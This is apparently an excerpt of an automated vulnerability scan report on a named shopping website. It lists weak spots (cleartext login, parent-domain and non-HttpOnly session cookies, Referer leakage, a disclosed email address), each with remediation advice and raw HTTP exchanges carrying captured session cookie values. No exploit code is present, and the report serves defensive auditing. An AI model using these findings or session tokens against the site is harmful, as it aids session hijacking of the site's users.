Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
Request
GET /interact/logon.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:17 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:16 GMT Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]... </script>
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /interact/default.asp HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Accept-Encoding: gzip, deflate,gzip, deflate Host: www.areyougame.com
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 19:45:42 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 18:45:42 GMT Set-Cookie: LogSessionID=96726646; domain=.areyougame.com; path=/ Set-Cookie: AreYouGame=LogUserID=96671002; expires=Mon, 26-Dec-2011 08:00:00 GMT; domain=.areyougame.com; path=/ Set-Cookie: ASPSESSIONIDSSBBDBDQ=DBOKLOLANHFNEHELGIACKMHM; path=/ Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /interact/promo.asp?promo=Shopping&desttype=itemno&dest=IF13035 HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 03:50:24 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Pragma: no-cache Location: item.asp?itemno=IF13035 Content-Length: 144 Content-Type: text/html Expires: Mon, 31 Mar 2008 02:50:24 GMT Set-Cookie: LogSessionID=96699467; domain=.areyougame.com; path=/ Set-Cookie: AreYouGame=SourceCode=Shopping&LogUserID=96643866; expires=Sun, 25-Dec-2011 08:00:00 GMT; domain=.areyougame.com; path=/ Set-Cookie: ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; path=/ Cache-control: no-cache
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="item.asp?itemno=IF13035">here</a>.</body>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /interact/AYGsearch.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:26 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:26 GMT Set-Cookie: cart%5Freferer=%2Finteract%2FAYGsearch%2Easp%3F; domain=.areyougame.com; path=/ Cache-control: no-cache
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /interact/addto_cart.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:49 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Location: view_cart.asp?check_cookies=true Content-Length: 153 Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:50 GMT Set-Cookie: AreYouGame=unreg%5Fid=8316481&member%5Fid=&LogUserID=96643866&SourceCode=Shopping; expires=Sun, 25-Dec-2011 08:00:00 GMT; domain=.areyougame.com; path=/ Cache-control: no-cache
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="view_cart.asp?check_cookies=true">here</a>.</body>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /interact/category.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:22 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:22 GMT Set-Cookie: cart%5Freferer=%2Finteract%2Fcategory%2Easp%3F; domain=.areyougame.com; path=/ Cache-control: no-cache
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /interact/newsletter.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:37 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:38 GMT Set-Cookie: cart%5Freferer=%2Finteract%2Fnewsletter%2Easp%3F; domain=.areyougame.com; path=/ Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /interact/view_cart.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:35 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:36 GMT Set-Cookie: cart%5Freferer=default%2Easp; domain=.areyougame.com; path=/ Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]...
5. Cookie without HttpOnly flag setpreviousnext There are 9 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.asp HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LogSessionID=96699467; AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=222988107.279130543.1293356328.1293356328.1293356328.1; __utmc=222988107; __utmb=222988107.1.10.1293356328
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 03:50:40 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Location: /interact/default.asp Content-Length: 142 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/interact/default.asp">here</a>.</body>
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /interact/default.asp HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Accept-Encoding: gzip, deflate,gzip, deflate Host: www.areyougame.com
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 19:45:42 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 18:45:42 GMT Set-Cookie: LogSessionID=96726646; domain=.areyougame.com; path=/ Set-Cookie: AreYouGame=LogUserID=96671002; expires=Mon, 26-Dec-2011 08:00:00 GMT; domain=.areyougame.com; path=/ Set-Cookie: ASPSESSIONIDSSBBDBDQ=DBOKLOLANHFNEHELGIACKMHM; path=/ Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /interact/promo.asp?promo=Shopping&desttype=itemno&dest=IF13035 HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 03:50:24 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Pragma: no-cache Location: item.asp?itemno=IF13035 Content-Length: 144 Content-Type: text/html Expires: Mon, 31 Mar 2008 02:50:24 GMT Set-Cookie: LogSessionID=96699467; domain=.areyougame.com; path=/ Set-Cookie: AreYouGame=SourceCode=Shopping&LogUserID=96643866; expires=Sun, 25-Dec-2011 08:00:00 GMT; domain=.areyougame.com; path=/ Set-Cookie: ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; path=/ Cache-control: no-cache
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="item.asp?itemno=IF13035">here</a>.</body>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /interact/AYGsearch.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:26 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:26 GMT Set-Cookie: cart%5Freferer=%2Finteract%2FAYGsearch%2Easp%3F; domain=.areyougame.com; path=/ Cache-control: no-cache
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /interact/addto_cart.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:49 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Location: view_cart.asp?check_cookies=true Content-Length: 153 Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:50 GMT Set-Cookie: AreYouGame=unreg%5Fid=8316481&member%5Fid=&LogUserID=96643866&SourceCode=Shopping; expires=Sun, 25-Dec-2011 08:00:00 GMT; domain=.areyougame.com; path=/ Cache-control: no-cache
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="view_cart.asp?check_cookies=true">here</a>.</body>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /interact/category.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:22 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:22 GMT Set-Cookie: cart%5Freferer=%2Finteract%2Fcategory%2Easp%3F; domain=.areyougame.com; path=/ Cache-control: no-cache
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /interact/newsletter.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:37 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:38 GMT Set-Cookie: cart%5Freferer=%2Finteract%2Fnewsletter%2Easp%3F; domain=.areyougame.com; path=/ Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /interact/view_cart.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:35 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:36 GMT Set-Cookie: cart%5Freferer=default%2Easp; domain=.areyougame.com; path=/ Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]...
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
Request
GET /interact/item.asp?itemno=IF13035 HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LogSessionID=96699467; AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 03:50:25 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 02:50:24 GMT Cache-control: no-cache
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /Interact/ HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:48 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:48 GMT Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]... <a href="mailto:orders@areyougame.com"> ...[SNIP]...
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /interact/AYGsearch.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:26 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:26 GMT Set-Cookie: cart%5Freferer=%2Finteract%2FAYGsearch%2Easp%3F; domain=.areyougame.com; path=/ Cache-control: no-cache
The following email address was disclosed in the response:
orders@areyougame.com
Request
GET /interact/GiftGuide.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 04:04:37 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Mar 2008 03:04:36 GMT Cache-control: no-cache
<script language="JavaScript">
var g_bHasLoggedOn = false;
var g_strMemID = ""; var g_strWebAddressSecure = "https://www.areyougame.com/Interact/"; var g_strWebAddress = "http://www.a ...[SNIP]... <a href="mailto:orders@areyougame.com"> ...[SNIP]...
The following email address was disclosed in the response:
orders@areyougame.com
Request
